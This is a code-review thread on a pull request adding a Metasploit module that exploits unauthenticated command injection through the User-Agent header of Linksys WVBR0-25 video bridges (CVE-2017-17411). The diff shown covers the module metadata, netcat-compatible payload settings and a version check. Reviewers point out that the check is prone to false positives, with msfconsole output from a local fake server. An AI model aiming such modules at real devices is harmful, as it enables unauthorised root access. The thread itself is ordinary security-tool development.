modules/exploits/linux/http/linksys_wvbr0_user_agent_exec_noauth.rb

```diff
@@ -0,0 +1,123 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'Linksys WVBR0-25 User-Agent Command Execution',
+      'Description' => %q{
+        The Linksys WVBR0-25 Wireless Video Bridge, used by DirecTV to connect wireless Genie
+        cable boxes to the Genie DVR, is vulnerable to OS command injection in version < 1.0.41
+        of the web management portal via the User-Agent header. Authentication is not required to
+        exploit this vulnerability.
+      },
+      'Author'      =>
+        [
+          'HeadlessZeke' # Vulnerability discovery and Metasploit module
+        ],
+      'License'     => MSF_LICENSE,
+      'References'  =>
+        [
+          ['CVE', '2017-17411'],
+          ['ZDI', '17-973'],
+          ['URL', 'https://www.thezdi.com/blog/2017/12/13/remote-root-in-directvs-wireless-video-bridge-a-tale-of-rage-and-despair']
+        ],
+      'DisclosureDate' => 'Dec 13 2017',
+      'Privileged'     => true,
+      'Payload'        =>
+        {
+          'DisableNops' => true,
+          'Space'       => 1024,
+          'Compat'      =>
+            {
+              'PayloadType' => 'cmd',
+              'RequiredCmd' => 'generic netcat'
+            }
+        },
+      'Platform'       => 'unix',
+      'Arch'           => ARCH_CMD,
+      'Targets'        => [[ 'Automatic', { }]],
+      'DefaultTarget'  => 0
+      ))
+  end
+
+  def check
+    begin
+      res = send_request_raw({
+        'method' => 'GET',
+        'uri' => '/'
+      })
+      if res && res.code == 200 && res.body.to_s =~ /Firmware Version: (1\.0\.(40|[1-3][0-9]|[0-9])\.|0\.)/  # version < 1.0.41
```

Comment:
**False positives** can be here.

```
linksys ➤ cat index.html
Vendor:LINKSYS ModelName:WVBR0-25-US Firmware Version: 1.0.35.163016 Firmware Builddate: 2014-08-26 18:05 Product.type: production Linux: Linux version 2.6.30 (root@build-vm) (gcc version 4.2.1 (ARC_2.3)) #1 Tue Aug 26 10:47:37 PDT 2014 Board: titans
linksys ➤ python -m http.server 8080
Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ...
```

```
msf exploit(linux/http/linksys_wvbr0_user_agent_exec_noauth) > show options

Module options (exploit/linux/http/linksys_wvbr0_user_agent_exec_noauth):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST                     yes       The target address
   RPORT    80               yes       The target port (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   VHOST                     no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(linux/http/linksys_wvbr0_user_agent_exec_noauth) > set RHOST 127.0.0.1
RHOST => 127.0.0.1
msf exploit(linux/http/linksys_wvbr0_user_agent_exec_noauth) > set RPORT 8080
RPORT => 8080
msf exploit(linux/http/linksys_wvbr0_user_agent_exec_noauth) > check
[+] 127.0.0.1:8080 The target is vulnerable.
```

Reply:
Hmm...that is true, but then again I can't think of a way to check this that can't also be faked in the same way...

Reply:
I think @nixawk is suggesting a more unique string to fingerprint?

Reply:
Also, it should return `CheckCode::Appears` if it's just a version check.

Reply:
Oh that’s an idea. If I have it echo back a random string at runtime, then it wouldn’t be possible to predict the response. I’ll do that instead.

Reply:
Yeah, that's the kind of check that would warrant `CheckCode::Vulnerable`. You even do it below with `cmd/unix/generic`. :)